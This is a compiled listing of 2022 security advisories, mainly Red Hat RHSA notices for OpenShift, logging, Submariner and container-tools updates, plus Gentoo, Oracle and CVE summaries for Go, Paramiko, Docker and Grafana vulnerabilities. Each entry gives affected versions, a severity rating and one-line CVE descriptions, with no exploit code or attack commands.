RHSA-2022:6348: Red Hat Security Advisory: Gatekeeper Operator v0.2 security and container updates

Gatekeeper Operator v0.2 security updates. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-30630: golang: io/fs: stack exhaustion in Glob * CVE-2022-30631: gol...

RHSA-2022:6183: Red Hat Security Advisory: Logging Subsystem 5.4.5 Security and Bug Fix Update

Logging Subsystem 5.4.5 - Red Hat OpenShift. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-32148: golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working

RHSA-2022:6346: Red Hat Security Advisory: RHSA: Submariner 0.13 - security and enhancement update

Submariner 0.13 packages that fix security issues and bugs, as well as add various enhancements, are now available for Red Hat Advanced Cluster Management for Kubernetes version 2.6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions...

Red Hat Security Advisory 2022-6290-01

Red Hat Security Advisory 2022-6290-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. Issues addressed include a denial of service vulnerability.

RHSA-2022:6290: Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.1.0 security and bug fix update

OpenShift API for Data Protection (OADP) 1.1.0 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-24675: golang: encoding/pem: fix stack overflow in Decode * CVE-2022-28327: golang: crypto/elliptic: panic caused by oversized scalar * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-30631: golang: compress/gzip: stack exhaus...

Red Hat Security Advisory 2022-6051-01

Red Hat Security Advisory 2022-6051-01 - An update is now available for RHOL-5.5-RHEL-8. Issues addressed include denial of service, man-in-the-middle, and out of bounds read vulnerabilities.

RHSA-2022:6051: Red Hat Security Advisory: Logging Subsystem 5.5.0 - Red Hat OpenShift security update

An update is now available for RHOL-5.5-RHEL-8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-0759: kubeclient: kubeconfig parsing error can lead to MITM attacks * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read

RHSA-2022:6113: Red Hat Security Advisory: Red Hat Application Interconnect 1.0 Release (rpms)

Red Hat Application Interconnect 1.0 introduces a service network, linking TCP and HTTP services across the hybrid cloud. A service network enables communication between services running in different network locations or sites. It allows geographically distributed services to connect as if they were all running in the same site. This is an update to the rpms for Red Hat Application Interconnect 1.0 to fix some security issues in the golang compiler. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original...

CVE-2022-32148

Improper exposure of client IP addresses in net/http before Go 1.17.12 and Go 1.18.4 can be triggered by calling httputil.ReverseProxy.ServeHTTP with a Request.Header map containing a nil value for the X-Forwarded-For header, which causes ReverseProxy to set the client IP as the value of the X-Forwarded-For header.

CVE-2022-1705

Acceptance of some invalid Transfer-Encoding headers in the HTTP/1 client in net/http before Go 1.17.12 and Go 1.18.4 allows HTTP request smuggling if combined with an intermediate server that also improperly fails to reject the header as invalid.

RHSA-2022:6040: Red Hat Security Advisory: Release of OpenShift Serverless 1.24.0

Release of OpenShift Serverless 1.24.0. The References section contains CVE links providing detailed severity ratings for each vulnerability. Ratings are based on a Common Vulnerability Scoring System (CVSS) base score. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs:
* CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header
* CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions
* CVE-2022-1996: go-restful: Authorization Bypass Through User-Controlled Key
* CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter
* CVE-2022-24675: golang: encoding/pem: fix stack overflow in Decode
* CVE-2022-24921: golang: regexp: stack exhaustion via a deeply nested expression
* C...

Gentoo Linux Security Advisory 202208-02

Gentoo Linux Security Advisory 202208-2 - Multiple vulnerabilities have been found in Go, the worst of which could result in remote code execution. Versions less than 1.18.5 are affected.

RHSA-2022:5525: Red Hat Security Advisory: Service Binding Operator security update

An update for service-binding-operator-bundle-container and service-binding-operator-container is now available for OpenShift Developer Tools and Services for OCP 4.7+. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs:
* CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

Red Hat Security Advisory 2022-2281-01

Red Hat Security Advisory 2022-2281-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 3.11.705.

RHSA-2022:2281: Red Hat Security Advisory: OpenShift Container Platform 3.11.705 security update

Red Hat OpenShift Container Platform release 3.11.705 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 3.11. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs:
* CVE-2022-1677: openshift/router: route hijacking attack via crafted HAProxy configuration file

Red Hat Security Advisory 2022-4712-01

Red Hat Security Advisory 2022-4712-01 - The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning. The ovirt-ansible-hosted-engine-setup package provides an Ansible role for deploying Red Hat Virtualization Hosted-Engine.

RHSA-2022:4712: Red Hat Security Advisory: RHV Engine and Host Common Packages security update

Updated dependency packages for ovirt-engine and ovirt-host that fix several bugs and add various enhancements are now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs:
* CVE-2022-24302: python-paramiko: Race condition in the write_private_key_file function

Red Hat Security Advisory 2022-4668-01

Red Hat Security Advisory 2022-4668-01 - Red Hat OpenShift Virtualization release 4.10.1 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

RHSA-2022:4668: Red Hat Security Advisory: OpenShift Virtualization 4.10.1 Images security and bug fix update

Red Hat OpenShift Virtualization release 4.10.1 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs:
* CVE-2021-36221: golang: net/http/httputil: panic due to racy read of persistConn after handler panic
* CVE-2021-41190: opencontainers: OCI manifest and index parsing confusion
* CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter

RHSA-2022:1762: Red Hat Security Advisory: container-tools:rhel8 security, bug fix, and enhancement update

An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs:
* CVE-2022-1227: psgo: Privilege escalation in 'podman top'
* CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter
* CVE-2022-27649: podman: Default inheritable capabilities for linux container should be empty
* CVE-2022-27650: crun: Default inheritable capabilities for linux container should be empty...

CVE-2022-21496: Oracle Critical Patch Update Advisory - April 2022

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...

CVE-2022-27191: An update of golang.org/x/crypto/ssh might be necessary

The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.

CVE-2022-24302: Changelog — Paramiko documentation

In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.

CVE-2021-22570: Release Protocol Buffers v3.15.0 · protocolbuffers/protobuf

Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater.

CVE-2021-21285: Docker Engine release notes

In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.

CVE-2020-11110: grafana/CHANGELOG.md at main · grafana/grafana

Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
